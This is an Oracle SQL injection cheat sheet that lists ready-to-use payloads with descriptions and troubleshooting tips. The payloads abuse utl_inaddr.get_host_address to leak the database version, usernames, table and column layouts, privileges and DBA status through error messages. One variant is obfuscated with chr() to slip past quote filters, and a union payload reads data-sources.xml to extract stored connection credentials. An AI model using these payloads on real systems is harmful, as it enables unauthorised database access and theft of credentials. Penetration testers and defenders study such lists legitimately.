Command |
Description |
Sample Picture |
Common Problems |
' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- |
Display the database version information in an error message (injected into a string)
[low privilege]
|
|
- Java not installed
- Oracle 11g ACL
- PUBLIC privilege removed
==> use an alternative function
|
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
|
Display the database version information in an error message (injected into an integer)
[low privilege]
|
|
- Java not installed
- Oracle 11g ACL
- PUBLIC privilege removed
==> use an alternative function
|
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))--
|
Display a list of all usernames (11g only)
[low privilege]
|
|
if stragg, it is possible to do the same using XMLDB. Soon here...
stragg is limited to 4096 bytes
|
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))-- |
Display a list of all user tables and the number of rows (11g only)
[low privilege]
|
|
if stragg, it is possible to do the same using XMLDB
stragg is limited to 4096 bytes
|
or 1=utl_inaddr.get_host_address((Select granted_role from ( select rownum r, granted_role from user_role_privs) where r=1)) |
Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
[low privilege]
|
|
or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA') FROM dual))
or 1=utl_inaddr.get_host_address((SELECT sys_context((select chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))
|
check if DBA, result: TRUE or FALSE
[low privilege]
|
|
If the usage of single quotes returns an ORA-0911 (invalid character) you should use the second string |
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59)) from user_tab_columns order by table_name,column_id))-- |
Get a list of all user tables including the column name and type
[low privilege]
|
|
union select extractvalue(value(c), '/connection-factory/@user')||'/'||extractvalue(value(c), '/connection-factory/@password')||'@'||substr(extractvalue(value(c), '/connection-factory/@url'),instr(extractvalue(value(c), '/connection-factory/@url'),'//')+2) conn
FROM table( XMLSequence( extract( xmltype( bfilename('GETPWDIR', 'data-sources.xml'), nls_charset_id('WE8ISO8859P1')), '/data-sources/connection-pool/connection-factory')) ) c |
Read files from the operating system using a simple SQL statement.
Limitations:
Oracle Directory must exist
XML Files only
|
|